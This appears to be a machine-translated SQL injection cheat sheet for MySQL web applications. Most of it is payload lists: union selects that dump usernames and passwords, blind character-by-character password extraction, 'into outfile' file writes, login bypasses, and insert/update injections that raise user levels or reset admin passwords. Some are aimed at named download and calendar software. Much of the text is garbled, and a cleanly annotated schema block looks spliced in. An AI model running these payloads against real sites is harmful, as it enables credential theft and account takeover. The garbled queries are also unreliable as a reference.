Material that both hackers and programmers need to understand.
'% 23' and passWord = 'mypass id =-1 union select 1, 1 id =-1 union select char (97), char (97), char (97) id = 1 union select 1, 1 from members id = 1 union select 1, 1 from admin id = 1 union select 1, 1, 1 from user userid = 1 and password = mypass userid = 1 and mid (password, 112) = char () userid = 1 and mid (password,) = char (97) and ord (mid (password, 111)> (the ord function is very useful and can return an integer) 'and LENGTH (password) = '6 (LENGTH of the probe password )' And LEFT (password, 1) = 'm' and LEFT (password, 2) = 'My .............................. And so on, 'Union select 1, username, password from user/* 'union select 1, username, password from user/* = 'Union select 1, username, password from user/* (can be 1 or = directly followed) 99999 'Union select 1, username, password from user/* 'into outfile' c:/file.txt (export file) = 'or 1 = 1 into outfile 'C:/file.txt 1' union select 1, username, password from user into outfile 'C: /user.txt select password FROM admins where login = 'John' INTO dumpfile'/path/to/site/file.txt 'id = 'Union select 1, username, password from user into outfile id =-1 union select 1, database (), version () (flexible application query)
Commonly used query test statements:
select * FROM table where 1=1 select * FROM table where 'uuu'='uuu' select * FROM table where 1<>2 select * FROM table where 3>2 select * FROM table where 2<3 select * FROM table where 1 select * FROM table where 1+1 select * FROM table where 1--1 select * FROM table where ISNULL(NULL) select * FROM table where ISNULL(COT(0)) select * FROM table where 1 IS NOT NULL select * FROM table where NULL IS NULL select * FROM table where 2 BETWEEN 1 AND 3 select * FROM table where 'b' BETWEEN 'a' AND 'c' select * FROM table where 2 IN (0,1,2) select * FROM table where CASE WHEN 1>0 THEN 1 END
Example 1: the Night Cat download system, version 1.0
Id = 1 union select, 1 union select,, 1 from ymdown_user union select, 1 from ymdown_user where id = 1 id = 10000 union select, 1 from ymdown_user where id = 1 and groupid = 1 union select 1, username, 1, password, 1 from ymdown_user where id = 1 (replace ) Union select, 1 from ymdown_user where id = 1 and ord (mid (password, 1, 1) = 49 (verify the first password) union select 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1 and ord (mid (password,) = 50 (second) union select, 1, 1, 1, 1 from ymdown_user where id = 1 and ord (mid (password, 3, 1 )) = 51 ..................................................................
Example 2: gray track transformation id test (meteor)
union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
Constructed statements:
Select allowsmilies, public, userid, eventdate, event, subject FROM calendar_events where eventid = 1 union (select 1, 1, 1, 1, 1 from user where userid = 1) select allowsmilies, public, userid, eventdate, event, subject FROM calendar_events where eventid = 1 union (select, username, password from user where userid = 1) union % 20 (select % 201,0, 2, '1970-01-01 ', 'A', password % 20 FROM % 20 user % 20 where % 20 userid % 20 = % 20 5) % 20 order % 20by % 20 eventdate union % 20 (select % ,,0, 12695, '2017-01-01 ', 'A ', password % 20 FROM % 20 user % 20 where % 20 userid = 13465) % 20 order % 20by % 20 eventdate union % 20 (select % ,,0, 12695, '2017-01-01 ', 'A', userid % 20 FROM % 20 user % 20 where % 20 username = 'sandlile') % 20 order % 20by % 20 eventdate (check the sand id) (select a FROM table_name where a = 10 and B = 1 ORDER BY a LIMIT 10) select * FROM article where articleid = '$ ID' union select * FROM ...... (When fields are the same as databases, you can directly submit them.) select * FROM article where articleid = '$ ID' union select, 1 FROM ...... (In different cases)
Special tips: input submitted through forms, search boxes, and similar places:
"___"". _ "" % 'Order BY articleid/* % 'Order BY articleid # _ 'Order BY articleid/* _ 'order by articleid # $ command = "dir c: \ "; system ($ command ); select * FROM article where articleid = '$ ID' select * FROM article where articleid = $ id 1' and 1 = 2 union select * from user where userid = 1/* changes (select * FROM article where articleid = '1' and 1 = 2 union select * from user where userid = 1 /*') 1 and 1 = 2 union select * from user where userid = 1
Statement format: create the database and table, then insert a row:
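-- Fixture schema used by the later examples (MySQL dialect: backticks, AUTO_INCREMENT).
-- The original ran CREATE DATABASE and CREATE TABLE as a single unterminated statement,
-- which the server rejects; every statement is terminated here and the script is idempotent.
CREATE DATABASE IF NOT EXISTS `injection`;
USE `injection`;

-- `user` is a reserved word in several engines, so it stays quoted.
CREATE TABLE IF NOT EXISTS `user` (
    `userid`   INT(11)     NOT NULL AUTO_INCREMENT,
    `username` VARCHAR(20) NOT NULL DEFAULT '',
    -- The sample keeps the password in clear text; a real schema stores a salted hash instead.
    `password` VARCHAR(20) NOT NULL DEFAULT '',
    PRIMARY KEY (`userid`)
);

-- Explicit column list so the row survives columns being added to the table later.
INSERT INTO `user` (`userid`, `username`, `password`) VALUES (1, 'swap', 'mypass');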
Insert templates used when registering a user (note that `$username`, `$password` and the other values are interpolated straight into the SQL string):
insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); "insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"; insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1') "insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"; insert INTO membres SET login='',password='',nom='',userlevel='3',email='' "insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"; update user SET password='$password', homepage='$homepage' where id='$id' update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id' "update membres SET password='$pass',nom='$nom',email='$email' where id='$id'"; update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]' "update news SET Votes=Votes+1, score=score+$note where idnews='$id'";
Extended functions:
DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER()
For example:
Update article SET title = $ title where articleid = 1 corresponding function update article SET title = DATABASE () where id = 1 # update the current database name to the title field update article SET title = USER () where id = 1 # update the current mysql User name to the title field update article SET title = SYSTEM_USER () where id = 1 # update the current MySQL User name to the title field update article SET title = SESSION_USER () where id = 1 # update the current MySQL User name to the title field update article SET title = CURRENT_USER () where id = 1 # update the username verified for the current session to the title field :: :::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::: $ req = "select * FROM membres where name like '% $ search %' order by name "; select * FROM membres where name like '%' order by uid # % 'Order BY name select uid FROM admins where login = ''OR 'a' = 'a' AND password ='' OR 'a' = 'a' (Classic) select uid FROM admins where login = ''OR admin_level = 1 # 'AND password = ''select * FROM table where msg like' % hop 'select uid FROM membres where login = 'Bob 'AND password like 'a %' # 'AND password = ''select * FROM membres where name like' % 'order by uid # % 'Order BY name